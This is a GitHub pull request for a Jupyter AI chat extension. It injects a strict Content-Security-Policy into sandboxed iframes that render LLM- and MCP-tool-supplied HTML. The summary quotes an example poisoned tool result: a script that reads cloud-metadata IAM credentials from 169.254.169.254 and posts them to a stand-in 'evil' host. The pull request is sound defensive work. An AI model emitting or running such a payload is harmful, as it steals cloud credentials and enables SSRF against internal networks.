security: inject strict CSP into HTMLFrame blob document#297
Open
pjdoland wants to merge 2 commits into
Open
Conversation
ChatResponseHTMLFrame renders LLM/MCP-supplied HTML in an iframe with sandbox="allow-scripts" backed by a blob: URL. The blob URL has a null origin so cookies and parent DOM are unreachable, but allow-scripts without same-origin still permits fetch() to any URL the user's browser can reach: 169.254.169.254 cloud metadata, cluster intranet hosts, the Jupyter server's own API. A poisoned tool result could ship a script that exfils metadata or pivots SSRF against the JupyterHub pod network. Inject a Content-Security-Policy meta tag at the top of every HTMLFrame blob via a new src/html-frame-csp.ts helper. The policy keeps inline scripts and styles enabled (matplotlib, plotly offline mode, custom dashboards typically inline everything they need), allows only data: images and fonts, and zeroes out every network sink: connect-src, frame-src, child-src, worker-src, manifest-src, media-src, object-src, form-action, base-uri. The meta is always prepended rather than spliced into <head>: an HTML-naive regex can be fooled by <head> inside a comment or noscript, which would let the real <head> run unguarded. Browsers fold a leading meta into the synthetic <head> ahead of any author-supplied tag, so prepend is both simpler and safer.
Collaborator
Author
|
The behavior change here makes me a little nervous. This might be something for AFTER 5.0. @mbektas |
Second-pass review surfaced a quirks-mode regression: the always-prepend strategy put the CSP meta tag ahead of any leading `<!DOCTYPE html>`, which causes the browser parser to drop into quirks mode. Quirks mode breaks the CSS that matplotlib/plotly emit (and, in older WebKit, weakens some CSP enforcement details). Detect a leading doctype (with optional BOM and whitespace) and slot the meta immediately AFTER it instead of before. Comment-disguised doctypes (`<!-- <!DOCTYPE html> -->`) are not real doctypes and the regex correctly skips them, matching the browser's own ignoring of comment-wrapped doctypes. Tests pin (a) doctype-prefixed input keeps the doctype at position zero and slots the meta after, (b) BOM + leading whitespace before the doctype still works, (c) comment-disguised doctype is not matched and the meta goes at the start. Replaces the previous "meta before DOCTYPE" test which was actively wrong.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.This suggestion is invalid because no changes were made to the code.Suggestions cannot be applied while the pull request is closed.Suggestions cannot be applied while viewing a subset of changes.Only one suggestion per line can be applied in a batch.Add this suggestion to a batch that can be applied as a single commit.Applying suggestions on deleted lines is not supported.You must change the existing code in this line in order to create a valid suggestion.Outdated suggestions cannot be applied.This suggestion has been applied or marked resolved.Suggestions cannot be applied from pending reviews.Suggestions cannot be applied on multi-line comments.Suggestions cannot be applied while the pull request is queued to merge.Suggestion cannot be applied right now. Please check back later.
Summary
ChatResponseHTMLFrame(src/chat-sidebar.tsx) renders LLM and MCP-tool-supplied HTML inside<iframe sandbox="allow-scripts" src={blobUrl}>. The blob URL is null-origin so cookies and parent DOM are unreachable, butallow-scriptswithoutallow-same-originstill permitsfetch()against any URL the user's browser can reach:169.254.169.254cloud-metadata, cluster intranet hosts, the Jupyter server's own API.A poisoned tool result like
<script>fetch('http://169.254.169.254/latest/meta-data/iam/security-credentials/').then(r=>r.text()).then(t=>fetch('//evil/x',{method:'POST',body:t}))</script>runs inside the null-origin iframe and freely talks out to the LAN, cloud metadata, and any internal endpoint reachable from the pod. The blob's null origin doesn't constrain egress (CORS only governs reads, not side-effects).Solution
Inject a Content-Security-Policy
<meta>tag at the top of every HTMLFrame blob via a newsrc/html-frame-csp.tshelper:Inline scripts and styles stay enabled: most LLM/tool HTML output (matplotlib, plotly offline export, custom dashboards) is self-contained inline. Image and font loads are restricted to
data:URIs so embedded visualizations still render. Every network sink is closed:fetch,XHR,WebSocket,EventSource,sendBeacon,<img>external loads,<a ping>, Workers, Service Workers,<embed>,<object>,<base>rewrites, form submissions. The<iframe sandbox>already omitsallow-top-navigationandallow-popups, so the parent window can't be redirected for exfil.The meta is almost always prepended rather than spliced into
<head>: an HTML-naive regex can be fooled by<head>inside a comment,<noscript>,<textarea>, or a CDATA-looking blob, which would leave the real<head>running unguarded. The one exception is a leading<!DOCTYPE>declaration: a doctype has to remain at position zero or the document parses in quirks mode, which breaks the CSS that matplotlib/plotly emit (and weakens CSP enforcement details in older WebKit). When a doctype is detected (allowing for an optional BOM and leading whitespace), the meta is spliced in immediately AFTER the doctype rather than before it. A comment-disguised doctype is not a real doctype and the regex skips it, matching the browser's own ignoring of comment-wrapped doctypes.Testing
tests/ts/html-frame-csp.test.ts: 14 cases covering directive coverage, prepend semantics (no<head>, author-supplied<head>,<head>hidden in a comment, comment-disguised doctype), DOCTYPE placement (with and without BOM + leading whitespace), ordering relative to<script>, and the idempotency caveat (two metas are harmless, strictest wins).Risks / follow-ups
NBI_HTMLFRAME_CSP_EXTRAadmin-policy env var that appends additional sources (e.g.,connect-src https://cdn.plot.ly) for deployments that want to permit specific trusted CDNs.useMemo([])inChatResponseHTMLFramecaches the blob URL on mount and never recomputes whenprops.sourcechanges. Pre-existing; not introduced here. Safe in practice because each streamed HTMLFrame gets a distinct React key.URL.createObjectURLinChatResponseHTMLFrameis never paired withURL.revokeObjectURL. Pre-existing leak; not introduced here. Long chat sessions accumulate blob URLs until the document unloads.